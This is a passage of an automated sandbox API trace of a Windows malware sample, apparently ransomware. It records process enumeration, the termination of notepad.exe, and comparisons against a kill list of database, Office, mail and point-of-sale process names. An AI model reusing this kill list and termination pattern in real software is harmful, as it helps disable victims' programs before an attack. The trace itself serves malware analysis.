cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="killed-dependent.exe")) returned 1 [0064.647] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mercury.exe")) returned 1 [0064.647] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smithsonian_census_litigation.exe")) returned 1 [0064.648] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="hrs.exe")) returned 1 [0064.649] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="combined nearest.exe")) returned 1 [0064.649] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="equations.exe")) returned 1 [0064.650] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pubmed-ranging-expired.exe")) returned 1 [0064.651] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ng microphone options.exe")) returned 1 [0064.651] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="perspectivesimagineclassics.exe")) returned 1 [0064.652] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="exposure.exe")) returned 1 [0064.748] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="tablet.exe")) returned 1 [0064.749] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="essex_serious.exe")) returned 1 [0064.750] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fbi-conflicts.exe")) returned 1 [0064.751] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="madisoncorn.exe")) returned 1 [0064.752] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="treaty restoration.exe")) returned 1 [0064.753] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ministries_vegetable_facilitate.exe")) returned 1 [0064.754] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0064.755] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0064.756] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0064.757] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0064.758] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0064.759] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0064.759] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0064.760] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x534, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0064.761] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0064.762] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0064.763] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0064.764] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0064.764] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0064.765] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0064.766] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0064.767] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0064.768] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0064.769] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0064.771] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0064.772] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0064.774] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0064.775] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0064.777] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0064.779] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0064.781] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0064.783] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0064.784] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0064.786] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0064.787] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0064.789] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0064.790] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0064.792] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0064.793] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0064.795] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0064.796] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0064.797] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0064.798] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0064.800] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0064.801] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0064.802] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0064.803] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0064.804] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0064.805] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0064.806] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0064.807] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reunion fabrics fed.exe")) returned 1 [0064.809] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="work_merchants_mighty.exe")) returned 1 [0064.810] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="substances.exe")) returned 1 [0064.811] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="holy.exe")) returned 1 [0064.812] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="debut-debate-acquisition.exe")) returned 1 [0064.813] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0064.814] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0064.815] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0064.815] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0064.816] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0064.817] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcrqdk.exe")) returned 1 [0064.818] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0064.819] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0064.819] CloseHandle (hObject=0x198) returned 1 [0064.819] GetCurrentProcessId () returned 0x2a8 [0064.820] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=1, dwProcessId=0x80c) returned 0x198 [0064.820] TerminateProcess (hProcess=0x198, uExitCode=0x1) returned 1 [0064.823] CloseHandle (hObject=0x198) returned 1 [0064.823] wvsprintfA (in: param_1=0x219e5f8, param_2="Killed process: %s [pid: %ld]", arglist=0x219eb38 | out: param_1="Killed process: notepad.exe [pid: 2060]") returned 39 [0064.823] wsprintfA (in: param_1=0x219e5f8, param_2="%s\r\n" | out: param_1="Killed process: notepad.exe [pid: 2060]\r\n") returned 41 [0064.823] GetLocalTime (in: lpSystemTime=0x219eaf8 | out: lpSystemTime=0x219eaf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x2f, wMilliseconds=0x1ee)) [0064.823] wsprintfA (in: param_1=0x219e9f8, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:47] ") returned 11 [0064.823] SetThreadUILanguage (LangId=0x409) returned 0x409 [0064.823] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0064.935] WriteFile (in: hFile=0x7, lpBuffer=0x219e9f8*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x219eb24, lpOverlapped=0x0 | out: lpBuffer=0x219e9f8*, lpNumberOfBytesWritten=0x219eb24*=0xb, lpOverlapped=0x0) returned 1 [0064.936] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0064.936] WriteFile (in: hFile=0x7, lpBuffer=0x219e5f8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x219eb24, lpOverlapped=0x0 | out: lpBuffer=0x219e5f8*, lpNumberOfBytesWritten=0x219eb24*=0x29, lpOverlapped=0x0) returned 1 [0064.937] GetConsoleWindow () returned 0x5011c [0064.937] IsWindowVisible (hWnd=0x5011c) returned 0 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="RdrCEF") returned -1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="sam") returned -1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="sql") returned -1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="oracle") returned -1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="ocssd") returned -1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="dbsnmp") returned 1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="synctime") returned -1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="agntsvc") returned 1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="isqlplussvc") returned 1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="xfssvccon") returned -1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="mydesktopservice") returned 1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="ocautoupds") returned -1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="encsvc") returned 1 [0064.937] lstrcmpiA (lpString1="notepad", lpString2="firefox") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="tbirdconfig") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="mydesktopqos") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="ocomm") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="dbeng50") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="sqbcoreservice") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="excel") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="infopath") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="msaccess") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="mspub") returned 1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="onenote") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="outlook") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="powerpnt") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="steam") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="thebat") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="thunderbird") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="visio") returned -1 [0064.938] lstrcmpiA (lpString1="notepad", lpString2="winword") returned -1 [0064.938] lstrcmpiA 